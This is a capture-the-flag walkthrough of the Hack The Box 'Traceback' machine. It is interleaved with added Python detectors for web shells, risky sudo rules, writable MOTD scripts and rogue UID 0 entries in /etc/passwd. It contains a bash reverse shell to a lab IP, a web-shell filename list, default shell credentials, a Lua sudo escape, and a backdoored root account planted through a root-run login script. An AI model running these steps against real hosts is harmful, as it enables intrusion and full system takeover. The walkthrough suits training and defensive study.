Enumeration

As usual, we start off with an nmap scan to get a listing of open ports and running services on the target:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see a fairly typical Linux web server setup, with port 22 for remote SSH administration and port 80 hosting the actual web application.

Going to the site in the browser, we see a page that appears to have been hacked. The site title mentions that a backdoor has been left for the whole internet. We kick off some directory busting:

feroxbuster -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

However, this won’t find anything. The key is in a comment in the source code of index.html:

<body>
	<center>
		<h1>This site has been owned</h1>
		<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
		<h3> - Xh4H - </h3>
		<!--Some of the best web shells that you might need ;)-->
	</center>
</body>

We can do a Google search for web shells, and interestingly, there is a GitHub page containing this exact string: https://github.com/TheBinitGhimire/Web-Shells?tab=readme-ov-file

We can convert the file names listed there into a wordlist and use it with feroxbuster:

shell.php
shell.asp
shell.jsp
alfav3-encoded.php
alfav4.1-decoded.php
alfav4.1-encoded.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
TwemlowsWebShell.php
wso2.8.5.php

feroxbuster -u http://$target/ -w ./shell_names.lst

This will successfully return a result for the smevk.php shell. We can browse to it at http://$target/smevk.php where we are presented with a login page to the shell.

Hackers are typically lazy and don’t change the passwords on these things. Trying admin:admin works. I guessed this, but it’s also in the source code of the web shell.
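From the defender's side, the same file-name list doubles as a detection input. The following is an added example (not from the original post or the linked repository): it walks a document root and flags PHP files by known web-shell name or by the combination of request input and a code/command execution call; the two sample strings are constructed for the demonstration.

```python
import os
import re

# Filenames from the public web-shell collection linked above (the same list we used as a wordlist).
KNOWN_SHELL_NAMES = {
    "shell.php", "shell.asp", "shell.jsp", "alfav3-encoded.php", "alfav4.1-decoded.php",
    "alfav4.1-encoded.php", "andela.php", "bloodsecv4.php", "by.php", "c99ud.php", "cmd.php",
    "configkillerionkros.php", "mini.php", "obfuscated-punknopass.php", "punk-nopass.php",
    "punkholic.php", "r57.php", "smevk.php", "twemlowswebshell.php", "wso2.8.5.php",
}

# Calls that execute code or commands, and the decoders usually wrapped around them to hide the payload.
DANGEROUS_CALLS = re.compile(r"\b(eval|assert|shell_exec|passthru|system|proc_open|popen|exec)\s*\(", re.I)
DECODERS = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")

def classify(filename, source):
    """Return the reasons a PHP file looks like a web shell (empty list means no indicator fired)."""
    reasons = []
    if os.path.basename(filename).lower() in KNOWN_SHELL_NAMES:
        reasons.append("known web-shell filename")
    calls = sorted({m.group(1).lower() for m in DANGEROUS_CALLS.finditer(source)})
    if calls and REQUEST_INPUT.search(source):
        # Request data sitting next to an execution primitive is the core of every command shell.
        reasons.append("request input reaches " + ", ".join(calls))
    if "eval" in calls and DECODERS.search(source):
        reasons.append("eval of decoded payload")
    return reasons

def scan_webroot(root):
    """Walk a document root and map each suspicious PHP file to its indicators."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".phar")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reasons = classify(path, fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if reasons:
                findings[path] = reasons
    return findings

# Constructed samples: a minimal command shell, and a harmless page that also reads request data.
SHELL_SAMPLE = '<?php $c = $_POST["cmd"]; echo shell_exec($c); ?>'
CLEAN_SAMPLE = '<?php echo htmlspecialchars($_GET["name"]); ?>'
```

Run `scan_webroot("/var/www/html")` on a suspect host; a clean application should produce an empty dictionary, and each hit lists which indicator fired so it can be triaged.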

Getting a shell is rather simple at that point: the web shell has an execute input, so we can just put in a typical bash TCP reverse shell (change the host and port to your own):

bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4444 <&1'

We can catch this shell using:

rlwrap nc -lnvp 4444

Escalation to sysadmin

We arrive on the host as the webadmin user. The first thing to do, as usual, is gain some situational awareness, and one of the first questions to ask yourself is, “what can this user do?”. With that in mind, we run sudo -l:

Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

Additionally, in the home directory, there is a note we can read:

webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

Oddly enough, this is one of the few hosts on HTB where the .bash_history file is not symlinked to /dev/null, so we can read it:

ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout

We now have all the information needed to escalate privileges. We can write a Lua file to our current directory (the home directory) and run a tool as sysadmin that interprets Lua code. GTFOBins has the details on getting a shell from Lua: https://gtfobins.github.io/gtfobins/lua/#shell

We can produce a privesc.lua script just like the previous hacker did:

os.execute("/bin/bash")

And execute it as sysadmin using sudo:

sudo -u sysadmin /home/sysadmin/luvit privesc.lua

We are successful and get a shell as sysadmin.
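The underlying misconfiguration is a sudo rule that hands an interpreter to another account. As an added example (not part of the original walkthrough), this audit parses `sudo -l` output, using a constructed copy of the rule shown above, and flags grants that are NOPASSWD, point at a shell-capable interpreter, or run a binary from a user-writable location rather than a root-owned system path; the interpreter list is a short illustrative subset of what GTFOBins catalogues.

```python
import os
import re

# `sudo -l` output captured above, copied here as constructed sample input.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
"""

# Interpreters that can spawn a shell (illustrative subset); a sudo grant on one is a grant of the whole account.
SHELL_CAPABLE = {"lua", "luvit", "python", "python3", "perl", "ruby", "node", "php", "bash", "sh"}

# One rule line: "(runas_user[:runas_group]) [TAG: ...] command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_rules(text):
    """Extract runas/nopasswd/command records from the command section of `sudo -l`."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True  # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_commands else None
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append({"runas": m.group("runas").split(":")[0].strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "cmd": m.group("cmd")})
    return rules

def audit(rules):
    """Return (command, runas, problems) for each rule that effectively hands over the target account."""
    findings = []
    for r in rules:
        binary = r["cmd"].split()[0]
        problems = []
        if r["cmd"] == "ALL" or os.path.basename(binary) in SHELL_CAPABLE:
            problems.append("shell-capable command")
        if r["nopasswd"]:
            problems.append("NOPASSWD")
        if binary.startswith(("/home/", "/tmp/", "/dev/shm/")):
            problems.append("binary outside root-owned system paths")
        if problems:
            findings.append((r["cmd"], r["runas"], problems))
    return findings
```

The fix is the inverse of each finding: no sudo grants on interpreters, no NOPASSWD for anything that can spawn a shell, and only root-owned binaries under paths the target user cannot write to.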

Escalation to root

Running ps aux as sysadmin will, if you’re lucky, show that there is some kind of cron job interacting with the /etc/update-motd.d files:

root       8804  0.0  0.0  58792  3212 ?        S    03:25   0:00 /usr/sbin/CRON -f
root       8806  0.0  0.0   4628   804 ?        Ss   03:25   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
root       8809  0.0  0.0   7468   824 ?        S    03:25   0:00 sleep 30

If you don’t see this immediately, it would be better to run pspy on the target to watch for process changes. I was lucky.

Running ls -la on the directory reveals:

total 32
drwxr-xr-x  2 root sysadmin 4096 Apr 22  2021 .
drwxr-xr-x 80 root root     4096 Apr 22  2021 ..
-rwxrwxr-x  1 root sysadmin  981 Sep  3 03:27 00-header
-rwxrwxr-x  1 root sysadmin  982 Sep  3 03:27 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Sep  3 03:27 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Sep  3 03:27 80-esm
-rwxrwxr-x  1 root sysadmin  299 Sep  3 03:27 91-release-upgrade

The sysadmin user has write access to the files here through the group permissions. Running cat on 00-header reveals:

#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <[email protected]>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"

This is what the hacker did to modify the message of the day that pops up when you SSH to the host. These files are executed upon SSH login, so if we edit one with an exploit, log out, and log back in via SSH, the exploit will be triggered.

To enable our SSH login, we can run ssh-keygen, point the output files to /dev/shm, and then run cat /dev/shm/id_rsa.pub >> ~/.ssh/authorized_keys. We can exfiltrate the private key id_rsa and use it to log in with ssh -i id_rsa sysadmin@$target.

To set up the exploit to be triggered on login, we add echo 'pentester:$1$3/vMHtaa$SK5QeFSNPR40GFN6YEbJ1.:0:0:root:/root:/bin/bash' >> /etc/passwd to the end of /etc/update-motd.d/00-header.

Log out and log back in via SSH as the sysadmin user, then run su pentester with Pentester123! as the password to gain a shell as the pentester user, which has UID 0 and therefore effective root permissions.

$ su pentester
Password:
root@traceback:/home/sysadmin# whoami
root
root@traceback:/home/sysadmin#
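Two things made this chain work: scripts that run at login were writable by a non-root group, and the root shell was planted as an extra UID 0 line in /etc/passwd. As an added example (not from the original walkthrough), the checks below cover both: one evaluates the ownership and mode bits of each script in /etc/update-motd.d, the other parses /etc/passwd for a second UID 0 account or an inline hash. The passwd sample is constructed and contains the line the walkthrough appended; the group id 1001 in the test is an assumed value.

```python
import os
import stat

def motd_script_risks(mode, uid, gid):
    """Explain why a script in /etc/update-motd.d is dangerous, given its st_mode and owner ids.
    These scripts run as root at every login, so anyone who can edit one can run code as root."""
    risks = []
    if uid != 0:
        risks.append("not owned by root")
    if mode & stat.S_IWGRP and gid != 0:
        risks.append("writable by non-root group %d" % gid)
    if mode & stat.S_IWOTH:
        risks.append("world-writable")
    return risks

def audit_motd_dir(path="/etc/update-motd.d"):
    """Map each risky MOTD script in the directory to its list of risks."""
    findings = {}
    for name in sorted(os.listdir(path)):
        st = os.stat(os.path.join(path, name))
        risks = motd_script_risks(st.st_mode, st.st_uid, st.st_gid)
        if risks:
            findings[name] = risks
    return findings

def audit_passwd(text):
    """Flag /etc/passwd lines that give UID 0 to a second name or carry a hash instead of 'x'."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((lineno, name, "second UID 0 account"))
        if passwd not in ("x", "*", "!", "!!", ""):
            # A real hash here is honoured by login and su, bypassing /etc/shadow entirely.
            findings.append((lineno, name, "password hash in passwd instead of shadow"))
    return findings

# Constructed sample: a normal passwd file plus the line appended by the 00-header modification above.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/bash
pentester:$1$3/vMHtaa$SK5QeFSNPR40GFN6YEbJ1.:0:0:root:/root:/bin/bash
"""
```

On the listing shown above, every script reports "writable by non-root group", which is the finding to fix (root:root, mode 755) rather than the cron job that keeps restoring them.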